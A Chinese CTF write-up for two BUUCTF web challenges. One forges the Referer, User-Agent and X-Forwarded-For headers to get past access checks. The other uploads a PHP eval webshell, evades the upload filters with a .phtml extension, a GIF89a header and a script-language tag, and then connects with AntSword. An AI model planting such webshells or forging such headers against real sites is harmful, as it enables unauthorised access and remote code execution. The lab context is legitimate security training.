BUUCTF——WEB(4)

[极客大挑战 2019]Http 1

HTTP头伪造

f12查看

跳转

页面提示它不是来源于这个网址,用burpsuite抓包加上这个 Referer: https://Sycsecret.buuoj.cn

服务器检查来源 当直接访问 /secret.php 时,服务器返回的错误信息明确表示:

It doesn't come from 'https://Sycsecret.buuoj.cn'

这说明服务器在验证请求的来源(即 HTTP Referer 头),要求请求必须是从 https://Sycsecret.buuoj.cn 跳转过来的。

Referer 头的作用 HTTP Referer 头用于告诉服务器当前请求是从哪个页面链接过来的。

服务器可以通过检查这个头来:

防止未经授权的直接访问(比如用户直接输入 URL 访问敏感页面)

实现简单的 CSRF(跨站请求伪造)防护

统计流量来源 绕过访问控制

由于服务器明确要求请求必须来自 https://Sycsecret.buuoj.cn

手动添加 Referer 头是为了: 伪造请求来源,让服务器认为请求是从 Sycsecret.com 跳转过来的

绕过服务器的来源验证机制 添加 Referer: https://www.Sycsecret.com 是为了 伪造请求来源,绕过服务器的来源验证机制,从而继续渗透测试流程。

提示

浏览器验证 添加完referer头之后看到服务器要求来自 "Syclover" 浏览器,所以我们修改 User-Agent 头为 Syclover 浏览器标识

提示

只能从本地访问

  • 添加 X-Forwarded-For: 127.0.0.1 头绕过本地访问限制

[极客大挑战 2019]Upload 1

文件上传

先上传一句话木马

复制代码
<?php
@eval($_POST['cmd'])
?>

提示

修改类型

提示

修改文件后缀phtml尝试绕过

过滤了<? 那么尝试改成

复制代码
 <script>alert("whoami")</script>

应该是检查了文件内容

添加图片文件头

GIF89a

成功上传

猜测访问路径/upload/test.phtml

成功执行alert()

修改为一句话木马

上传

复制代码
GIF89a? 
<script language="php">eval($_POST['cmd'])</script>

访问蚁剑连接

找flag

相关推荐
华玥作者17 小时前
[特殊字符] VitePress 对接 Algolia AI 问答(DocSearch + AI Search)完整实战(下)
前端·人工智能·ai
Mr Xu_17 小时前
告别冗长 switch-case:Vue 项目中基于映射表的优雅路由数据匹配方案
前端·javascript·vue.js
前端摸鱼匠17 小时前
Vue 3 的toRefs保持响应性:讲解toRefs在解构响应式对象时的作用
前端·javascript·vue.js·前端框架·ecmascript
lang2015092817 小时前
JSR-340 :高性能Web开发新标准
java·前端·servlet
好家伙VCC18 小时前
### WebRTC技术:实时通信的革新与实现####webRTC(Web Real-TimeComm
java·前端·python·webrtc
未来之窗软件服务19 小时前
未来之窗昭和仙君(六十五)Vue与跨地区多部门开发—东方仙盟练气
前端·javascript·vue.js·仙盟创梦ide·东方仙盟·昭和仙君
嘿起屁儿整19 小时前
面试点(网络层面)
前端·网络
VT.馒头19 小时前
【力扣】2721. 并行执行异步函数
前端·javascript·算法·leetcode·typescript
phltxy20 小时前
Vue 核心特性实战指南:指令、样式绑定、计算属性与侦听器
前端·javascript·vue.js
Byron070721 小时前
Vue 中使用 Tiptap 富文本编辑器的完整指南
前端·javascript·vue.js